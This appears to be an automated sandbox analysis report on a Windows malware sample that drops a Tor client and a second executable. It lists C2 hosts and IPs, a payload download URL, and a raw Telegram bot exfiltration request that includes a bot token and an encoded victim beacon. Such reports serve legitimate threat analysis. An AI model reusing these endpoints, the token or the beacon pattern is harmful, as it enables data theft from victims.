Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C19A911 CONF_imodule_get_value,NCONF_get_section,OPENSSL_sk_num,OPENSSL_sk_value,strrchr,CRYPTO_malloc,memcpy,OBJ_create,CRYPTO_free,OPENSSL_sk_num,ERR_put_error,ERR_put_error,ERR_put_error,	25_2_6C19A911
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1D0900 CRYPTO_zalloc,memcpy,CRYPTO_clear_free,CRYPTO_secure_zalloc,CRYPTO_secure_clear_free,ERR_put_error,ERR_put_error,ERR_put_error,	25_2_6C1D0900
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C272960 ERR_load_strings_const,CRYPTO_THREAD_run_once,CRYPTO_THREAD_write_lock,OPENSSL_LH_insert,CRYPTO_THREAD_unlock,	25_2_6C272960
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1BA954 BUF_MEM_free,CRYPTO_free,CRYPTO_free,	25_2_6C1BA954
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C29A970 OPENSSL_thread_stop,CRYPTO_THREAD_get_local,CRYPTO_THREAD_set_local,CRYPTO_free,	25_2_6C29A970
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1A8940 CRYPTO_THREAD_lock_free,CRYPTO_THREAD_lock_new,ERR_put_error,	25_2_6C1A8940
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C18E944 CRYPTO_malloc,EVP_PKEY_size,CRYPTO_malloc,EVP_DigestInit_ex,EVP_DigestUpdate,ERR_put_error,EVP_MD_CTX_free,CRYPTO_clear_free,CRYPTO_clear_free,ASN1_TYPE_free,ASN1_TYPE_new,ASN1_OBJECT_free,OBJ_nid2obj,ASN1_TYPE_free,	25_2_6C18E944
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C3049B0 CRYPTO_THREAD_get_local,GetLastError,TlsGetValue,SetLastError,	25_2_6C3049B0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1B6990 CRYPTO_free,CRYPTO_free,	25_2_6C1B6990
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1DC990 Camellia_decrypt,	25_2_6C1DC990
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C304990 CRYPTO_THREAD_init_local,TlsAlloc,	25_2_6C304990
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1F89B0 DES_cfb_encrypt,DES_encrypt1,	25_2_6C1F89B0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C19A9AB CRYPTO_malloc,memcpy,OBJ_create,CRYPTO_free,OPENSSL_sk_num,	25_2_6C19A9AB
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1989A4 CRYPTO_free,CRYPTO_free,CRYPTO_free,	25_2_6C1989A4
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1F29A0 CONF_modules_load_file,NCONF_new,NCONF_load,CONF_modules_load,NCONF_free,ERR_peek_last_error,ERR_clear_error,CONF_get1_default_config_file,CRYPTO_free,	25_2_6C1F29A0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C3049F0 CRYPTO_THREAD_set_local,TlsSetValue,	25_2_6C3049F0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1D09DC CRYPTO_secure_clear_free,	25_2_6C1D09DC
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1A89D6 CRYPTO_THREAD_lock_new,ERR_put_error,	25_2_6C1A89D6
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C27A9F0 EVP_MD_CTX_copy_ex,ENGINE_init,EVP_MD_CTX_reset,EVP_MD_CTX_clear_flags,memcpy,EVP_PKEY_CTX_dup,ERR_put_error,EVP_MD_CTX_set_flags,ERR_put_error,CRYPTO_malloc,EVP_MD_CTX_reset,ERR_put_error,	25_2_6C27A9F0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C2AC9F0 CRYPTO_strdup,strlen,CRYPTO_malloc,strcpy,	25_2_6C2AC9F0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C3409D0 BN_bn2hex,strlen,CRYPTO_malloc,OPENSSL_strlcpy,OPENSSL_strlcat,CRYPTO_free,OPENSSL_strlcpy,OPENSSL_strlcat,ERR_put_error,CRYPTO_free,	25_2_6C3409D0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C2909C0 EVP_PKEY_new,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_put_error,ERR_put_error,CRYPTO_free,	25_2_6C2909C0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C2A29C0 CRYPTO_cfb128_8_encrypt,__stack_chk_fail,	25_2_6C2A29C0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1F69F0 CRYPTO_zalloc,ERR_put_error,	25_2_6C1F69F0

Source: tor-real.exe, 00000019.00000002.4506289259.0000000004247000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN RSA PUBLIC KEY-----

memstr_f5bcfea9-4

Found inlined nop instructions (likely shell or obfuscated code)

Source: yt7dW9nyJK.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 199.188.200.89:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2

Source: yt7dW9nyJK.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: cmd.exe, 0000000E.00000003.2282783311.0000000002B85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdbCD9E3BB-4D03-46BD-8615-75A902267162.logg6 source: cmd.exe, 0000000E.00000003.2282783311.0000000002B85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdbWINLOA~1.PDB source: cmd.exe, 0000000E.00000003.2282653067.0000000002BA6000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	19_2_06290158
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 4x nop then jmp 096774BCh	19_2_096759B0
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 4x nop then jmp 096774BCh	19_2_096759B0
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	19_2_096759B0
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	19_2_096759B0
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 4x nop then jmp 0967B584h	19_2_0967B0E8
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-60h]	19_2_09672230
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 4x nop then jmp 096786C1h	19_2_096784C0
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-60h]	19_2_0967222E
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	19_2_0967AAE9
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 4x nop then jmp 096774BCh	19_2_09676F56
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	25_2_6C190E40

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: securefirewall.portmap.io

Found Tor onion address

Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 4.2.yt7dW9nyJK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, type: UNPACKEDPE

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.5:49707 -> 193.161.193.99:31510
Source: global traffic	TCP traffic: 192.168.2.5:49725 -> 140.78.100.15:8443
Source: global traffic	TCP traffic: 192.168.2.5:49726 -> 185.119.118.59:8080
Source: global traffic	TCP traffic: 192.168.2.5:49729 -> 193.142.146.239:9001
Source: global traffic	TCP traffic: 192.168.2.5:49730 -> 95.217.36.40:9993

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /uploaded/JxTcJM84e3NbGP4mm.exe HTTP/1.1Host: libyaalahrar.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zip HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/146779096/943f13f9-3eb9-4042-8722-d95f026c8b09?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240723%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240723T134702Z&X-Amz-Expires=300&X-Amz-Signature=684cb43c3b728dcd5e6fa405bf9e25ff74f8774c26110905339a58889403f8fe&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=146779096&response-content-disposition=attachment%3B%20filename%3Dtor-expert-bundle-v0.4.5.10.zip&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7418591347:AAEKXYhE74Nv1aE3mDgf4CpgdjKv5Zj4PmU/sendMessage?chat_id=6878338460&text=%23%44%65%66%61%75%6C%74%20%20%23%42%65%61%63%6F%6E%0A%0A%3C%62%3E%4F%53%3A%3C%2F%62%3E%20%3C%69%3E%4D%69%63%72%6F%73%6F%66%74%20%57%69%6E%64%6F%77%73%20%4E%54%20%36%2E%32%2E%39%32%30%30%2E%30%3C%2F%69%3E%0A%3C%62%3E%43%6F%75%6E%74%72%79%3A%3C%2F%62%3E%20%3C%69%3E%55%6E%69%74%65%64%20%53%74%61%74%65%73%3C%2F%69%3E%0A%3C%62%3E%55%73%65%72%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%61%6C%66%6F%6E%73%3C%2F%69%3E%0A%3C%62%3E%43%6F%6D%70%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%31%32%38%37%35%37%3C%2F%69%3E%0A%0A%3C%62%3E%52%65%70%6F%72%74%20%73%69%7A%65%3A%3C%2F%62%3E%20%30%2E%31%34%4D%62%0A&reply_markup=%7B%22%69%6E%6C%69%6E%65%5F%6B%65%79%62%6F%61%72%64%22%3A%5B%5B%7B%22%74%65%78%74%22%3A%22%44%6F%77%6E%6C%6F%61%64%22%2C%22%75%72%6C%22%3A%22%68%74%74%70%3A%2F%2F%31%38%35%2E%31%31%39%2E%31%31%38%2E%35%39%3A%38%30%38%30%2F%67%65%74%2F%64%30%4F%75%61%71%69%7A%66%7A%2F%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%72%74%2E%77%73%72%22%7D%2C%7B%22%74%65%78%74%22%3A%22%4F%70%65%6E%22%2C%22%75%72%6C%22%3A%22%68%74%74%70%3A%2F%2F%31%32%37%2E%30%2E%30%2E%31%3A%31%38%37%37%32%2F%68%61%6E%64%6C%65%4F%70%65%6E%57%53%52%3F%72%3D%68%74%74%70%3A%2F%2F%31%38%35%2E%31%31%39%2E%31%31%38%2E%35%39%3A%38%30%38%30%2F%67%65%74%2F%64%30%4F%75%61%71%69%7A%66%7A%2F%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%72%74%2E%77%73%72%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 193.161.193.99 193.161.193.99
Source: Joe Sandbox View	IP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox View	IP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: BITREE-ASRU BITREE-ASRU

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

May check the online IP address of the machine

Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: ip-api.com

Source: unknown	TCP traffic detected without corresponding DNS query: 51.158.147.144
Source: unknown	TCP traffic detected without corresponding DNS query: 51.158.147.144
Source: unknown	TCP traffic detected without corresponding DNS query: 51.158.147.144
Source: unknown	TCP traffic detected without corresponding DNS query: 72.132.134.217
Source: unknown	TCP traffic detected without corresponding DNS query: 72.132.134.217
Source: unknown	TCP traffic detected without corresponding DNS query: 72.132.134.217
Source: unknown	TCP traffic detected without corresponding DNS query: 140.78.100.15
Source: unknown	TCP traffic detected without corresponding DNS query: 140.78.100.15
Source: unknown	TCP traffic detected without corresponding DNS query: 140.78.100.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 140.78.100.15
Source: unknown	TCP traffic detected without corresponding DNS query: 140.78.100.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 51.158.147.144
Source: unknown	TCP traffic detected without corresponding DNS query: 51.158.147.144
Source: unknown	TCP traffic detected without corresponding DNS query: 140.78.100.15
Source: unknown	TCP traffic detected without corresponding DNS query: 140.78.100.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 140.78.100.15

Source: global traffic	HTTP traffic detected: GET /uploaded/JxTcJM84e3NbGP4mm.exe HTTP/1.1Host: libyaalahrar.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zip HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/146779096/943f13f9-3eb9-4042-8722-d95f026c8b09?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240723%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240723T134702Z&X-Amz-Expires=300&X-Amz-Signature=684cb43c3b728dcd5e6fa405bf9e25ff74f8774c26110905339a58889403f8fe&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=146779096&response-content-disposition=attachment%3B%20filename%3Dtor-expert-bundle-v0.4.5.10.zip&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7418591347:AAEKXYhE74Nv1aE3mDgf4CpgdjKv5Zj4PmU/sendMessage?chat_id=6878338460&text=%23%44%65%66%61%75%6C%74%20%20%23%42%65%61%63%6F%6E%0A%0A%3C%62%3E%4F%53%3A%3C%2F%62%3E%20%3C%69%3E%4D%69%63%72%6F%73%6F%66%74%20%57%69%6E%64%6F%77%73%20%4E%54%20%36%2E%32%2E%39%32%30%30%2E%30%3C%2F%69%3E%0A%3C%62%3E%43%6F%75%6E%74%72%79%3A%3C%2F%62%3E%20%3C%69%3E%55%6E%69%74%65%64%20%53%74%61%74%65%73%3C%2F%69%3E%0A%3C%62%3E%55%73%65%72%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%61%6C%66%6F%6E%73%3C%2F%69%3E%0A%3C%62%3E%43%6F%6D%70%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%31%32%38%37%35%37%3C%2F%69%3E%0A%0A%3C%62%3E%52%65%70%6F%72%74%20%73%69%7A%65%3A%3C%2F%62%3E%20%30%2E%31%34%4D%62%0A&reply_markup=%7B%22%69%6E%6C%69%6E%65%5F%6B%65%79%62%6F%61%72%64%22%3A%5B%5B%7B%22%74%65%78%74%22%3A%22%44%6F%77%6E%6C%6F%61%64%22%2C%22%75%72%6C%22%3A%22%68%74%74%70%3A%2F%2F%31%38%35%2E%31%31%39%2E%31%31%38%2E%35%39%3A%38%30%38%30%2F%67%65%74%2F%64%30%4F%75%61%71%69%7A%66%7A%2F%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%72%74%2E%77%73%72%22%7D%2C%7B%22%74%65%78%74%22%3A%22%4F%70%65%6E%22%2C%22%75%72%6C%22%3A%22%68%74%74%70%3A%2F%2F%31%32%37%2E%30%2E%30%2E%31%3A%31%38%37%37%32%2F%68%61%6E%64%6C%65%4F%70%65%6E%57%53%52%3F%72%3D%68%74%74%70%3A%2F%2F%31%38%35%2E%31%31%39%2E%31%31%38%2E%35%39%3A%38%30%38%30%2F%67%65%74%2F%64%30%4F%75%61%71%69%7A%66%7A%2F%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%72%74%2E%77%73%72%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
Source: tor-real.exe, 00000019.00000002.4504563243.0000000000F58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
Source: tor-real.exe, 00000019.00000002.4504563243.0000000000F58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.yahoo.comZ equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: securefirewall.portmap.io
Source: global traffic	DNS traffic detected: DNS query: libyaalahrar.co
Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: objects.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://101.126.19.171:80
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://121.171.125.177:9000
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002E69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002E65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=http://185.119.118.59:8080/get/d0Ouaqizfz/iAAD9_user
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002E69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:2789/
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002DE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:2789/pData
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://129.151.109.160:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://149.88.44.159:80
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://156.245.141.24:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://156.245.141.8:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://156.245.142.3:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://156.245.142.6:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://156.245.143.23:8080
Source: ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://156.245.143.25:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://156.245.144.19:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://156.245.146.28:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://156.245.146.30:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://156.245.147.30:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://156.245.148.3:8080
Source: ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080/%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080/d0Ouaqizfz/iAAD9_user
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080/get
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002E65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080/get/d0Ouaqizfz/iAAD9_user
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080t-cq
